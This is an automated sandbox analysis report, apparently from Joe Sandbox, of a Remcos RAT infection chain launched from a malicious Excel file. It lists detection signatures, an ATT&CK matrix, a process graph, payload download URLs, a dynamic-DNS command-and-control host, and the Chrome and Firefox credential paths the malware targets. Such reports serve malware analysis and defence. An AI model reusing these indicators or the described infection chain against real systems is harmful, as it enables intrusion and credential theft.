                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041A045 __EH_prolog,GdiplusStartup,CreateDirectoryW,Sleep,Sleep,GetLocalTime,Sleep,28_2_0041A045
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041B69E GetUserNameW,28_2_0041B69E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,28_2_00449210
                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001C.00000002.476275781.0000000000511000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.842095725.0000000000631000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.842095725.0000000000615000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3024, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTR
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data28_2_0040BA4D
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\28_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db28_2_0040BB6B

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-CJ3HJ1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-CJ3HJ1
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001C.00000002.476275781.0000000000511000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.842095725.0000000000631000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.842095725.0000000000615000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3024, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe28_2_0040569A

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information121
                  Scripting                  		Valid Accounts1
                  Native API                  		121
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		13
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts23
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		1
                  Bypass User Account Control                  		21
                  Obfuscated Files or Information                  		111
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Email Collection                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts221
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Access Token Manipulation                  		1
                  Install Root Certificate                  		2
                  Credentials In Files                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares111
                  Input Capture                  		1
                  Remote Access Software                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution                  		Login Hook1
                  Windows Service                  		1
                  DLL Side-Loading                  		NTDS3
                  File and Directory Discovery                  		Distributed Component Object Model4
                  Clipboard Data                  		2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts4
                  PowerShell                  		Network Logon Script222
                  Process Injection                  		1
                  Bypass User Account Control                  		LSA Secrets35
                  System Information Discovery                  		SSHKeylogging213
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials2
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Virtualization/Sandbox Evasion                  		DCSync21
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation                  		Proc Filesystem3
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  Remote System Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1500265 Sample: PO_304234.xls Startdate: 28/08/2024 Architecture: WINDOWS Score: 100 93 Multi AV Scanner detection for domain / URL 2->93 95 Suricata IDS alerts for network traffic 2->95 97 Found malware configuration 2->97 99 22 other signatures 2->99 12 EXCEL.EXE 57 29 2->12         started        process3 dnsIp4 89 192.3.193.155, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 12->89 91 zhort.de 88.99.66.38, 443, 49163, 49165 HETZNER-ASDE Germany 12->91 73 C:\Users\user\Desktop\PO_304234.xls (copy), Composite 12->73 dropped 75 C:\Users\user\...\IEnetworkroundthings[1].hta, HTML 12->75 dropped 141 Microsoft Office drops suspicious files 12->141 17 mshta.exe 10 12->17         started        21 mshta.exe 10 12->21         started        file5 signatures6 process7 dnsIp8 77 zhort.de 17->77 101 Suspicious command line found 17->101 103 PowerShell case anomaly found 17->103 23 cmd.exe 17->23         started        79 zhort.de 21->79 26 cmd.exe 21->26         started        signatures9 process10 signatures11 117 Suspicious powershell command line found 23->117 119 Wscript starts Powershell (via cmd or directly) 23->119 121 PowerShell case anomaly found 23->121 28 powershell.exe 24 23->28         started        32 powershell.exe 26->32         started        process12 file13 69 C:\...\wecreatedbuttersmoothbutterthin.vBS, Unicode 28->69 dropped 71 C:\Users\user\AppData\...\imlwlgjg.cmdline, Unicode 28->71 dropped 135 Suspicious powershell command line found 28->135 137 Installs new ROOT certificates 28->137 139 Suspicious execution chain found 28->139 34 wscript.exe 1 28->34         started        37 csc.exe 2 28->37         started        40 wscript.exe 32->40         started        42 csc.exe 32->42         started        signatures14 process15 file16 105 Suspicious powershell command line found 34->105 107 Wscript starts Powershell (via cmd or directly) 34->107 109 Very long command line found 34->109 111 3 other signatures 34->111 44 powershell.exe 4 34->44         started        65 C:\Users\user\AppData\Local\...\imlwlgjg.dll, PE32 37->65 dropped 47 cvtres.exe 37->47         started        49 powershell.exe 40->49         started        67 C:\Users\user\AppData\Local\...\mjo4tj0d.dll, PE32 42->67 dropped 51 cvtres.exe 42->51         started        signatures17 process18 signatures19 123 Suspicious powershell command line found 44->123 53 powershell.exe 12 4 44->53         started        57 powershell.exe 49->57         started        process20 dnsIp21 81 ia803104.us.archive.org 207.241.232.154, 443, 49168, 49176 INTERNET-ARCHIVEUS United States 53->81 113 Writes to foreign memory regions 53->113 115 Injects a PE file into a foreign processes 53->115 59 RegAsm.exe 3 10 53->59         started        63 RegAsm.exe 57->63         started        signatures22 process23 dnsIp24 83 cloudsave.duckdns.org 59->83 85 cloudsave.duckdns.org 192.3.64.135, 14645, 49170 AS-COLOCROSSINGUS United States 59->85 87 geoplugin.net 178.237.33.50, 49172, 80 ATOM86-ASATOM86NL Netherlands 59->87 125 Contains functionality to bypass UAC (CMSTPLUA) 59->125 127 Detected Remcos RAT 59->127 129 Contains functionality to steal Chrome passwords or cookies 59->129 133 3 other signatures 59->133 signatures25 131 Uses dynamic DNS services 83->131

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  PO_304234.xls11%ReversingLabs
                  PO_304234.xls20%VirustotalBrowse
                  PO_304234.xls100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  zhort.de2%VirustotalBrowse
                  geoplugin.net1%VirustotalBrowse
                  cloudsave.duckdns.org0%VirustotalBrowse
                  ia803104.us.archive.org1%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://ocsp.entrust.net030%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://go.micros0%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg100%URL Reputationmalware
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://crl.entrust.net/server1.crl00%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  https://secure.comodo.com/CPS00%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                  http://192.3.193.1550%Avira URL Cloudsafe
                  https://zhort.de/pitash00%Avira URL Cloudsafe
                  https://ia803104.us.archive.org0%Avira URL Cloudsafe
                  https://zhort.de/pitash40%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htax;EB0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                  https://zhort.de/(c50%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF0%Avira URL Cloudsafe
                  https://ia803104.us.archive.org1%VirustotalBrowse
                  http://192.3.193.1550%VirustotalBrowse
                  https://zhort.de/pitash8i0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF9%VirustotalBrowse
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaEB0%Avira URL Cloudsafe
                  https://ia803104.us.archive.org/27/items/vbs_202400%Avira URL Cloudsafe
                  https://zhort.de/pitash0%Avira URL Cloudsafe
                  http://geoplugin.net/json.gpSf0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaq;EB0%Avira URL Cloudsafe
                  http://192.3.193.155/=VEB0%Avira URL Cloudsafe
                  https://zhort.de/pitash2%VirustotalBrowse
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta60%Avira URL Cloudsafe
                  http://192.3.193.155/9VEB0%Avira URL Cloudsafe
                  https://ia803104.us.archive.org/27/items/vbs_202401%VirustotalBrowse
                  https://zhort.de/inG0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/REDS.txt0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta:KWWS0%Avira URL Cloudsafe
                  http://go.cr0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIFp0%Avira URL Cloudsafe
                  https://zhort.de/pitash;f0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta10%VirustotalBrowse
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htahttp://192.3.193.155/xampp/boz/bz/IEnetwor0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/REDS.txt9%VirustotalBrowse
                  https://zhort.de//r0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaC:0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaFC:0%Avira URL Cloudsafe
                  https://zhort.de/E30%Avira URL Cloudsafe
                  https://zhort.de/t0%Avira URL Cloudsafe
                  http://geoplugin.net/json.gpjf0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                  https://zhort.de/pitashta0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htac0%Avira URL Cloudsafe
                  cloudsave.duckdns.org0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htak0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htac;EB0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/w0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF34e089$0%Avira URL Cloudsafe
                  cloudsave.duckdns.org0%VirustotalBrowse
                  https://zhort.de/pitashzWEB0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
                  https://zhort.de/pitashvWEB0%Avira URL Cloudsafe
                  http://geoplugin.net/json.gpjf0%VirustotalBrowse
                  http://192.3.193.155/0%Avira URL Cloudsafe
                  http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF34e0890%Avira URL Cloudsafe
                  https://zhort.de/0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  zhort.de
                  		88.99.66.38
                  		truefalseunknown
                  geoplugin.net
                  		178.237.33.50
                  		truefalseunknown
                  cloudsave.duckdns.org
                  		192.3.64.135
                  		truetrueunknown
                  ia803104.us.archive.org
                  		207.241.232.154
                  		truetrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIFtrue
                  • 9%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://zhort.de/pitashfalse
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpgtrue
                  • URL Reputation: malware
                  		unknown
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htatrue
                  • 10%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/REDS.txttrue
                  • 9%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://geoplugin.net/json.gpfalse
                  • URL Reputation: safe
                  		unknown
                  cloudsave.duckdns.orgtrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://192.3.193.155powershell.exe, 0000000E.00000002.436681548.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.477435438.00000000028B9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://zhort.de/pitash4mshta.exe, 00000004.00000002.407298326.000000000053A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://zhort.de/pitash0mshta.exe, 00000004.00000002.407298326.000000000053A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ia803104.us.archive.orgpowershell.exe, 0000000E.00000002.436681548.0000000002622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.477435438.00000000026E1000.00000004.00000800.00020000.00000000.sdmptrue
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ocsp.entrust.net03mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htax;EBmshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://zhort.de/(c5mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://zhort.de/pitash8imshta.exe, 00000011.00000002.456621218.000000000039E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaEBmshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://go.microspowershell.exe, 00000007.00000002.423275187.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.423275187.0000000002B21000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ia803104.us.archive.org/27/items/vbs_20240powershell.exe, 0000000C.00000002.459682593.0000000002753000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.488464745.0000000002785000.00000004.00000800.00020000.00000000.sdmptrue
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://geoplugin.net/json.gp/Cpowershell.exe, 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://geoplugin.net/json.gpSfRegAsm.exe, 0000000F.00000002.842261724.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaq;EBmshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://192.3.193.155/=VEBmshta.exe, 00000004.00000003.406238458.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D8D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta6mshta.exe, 00000004.00000002.407298326.000000000050A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
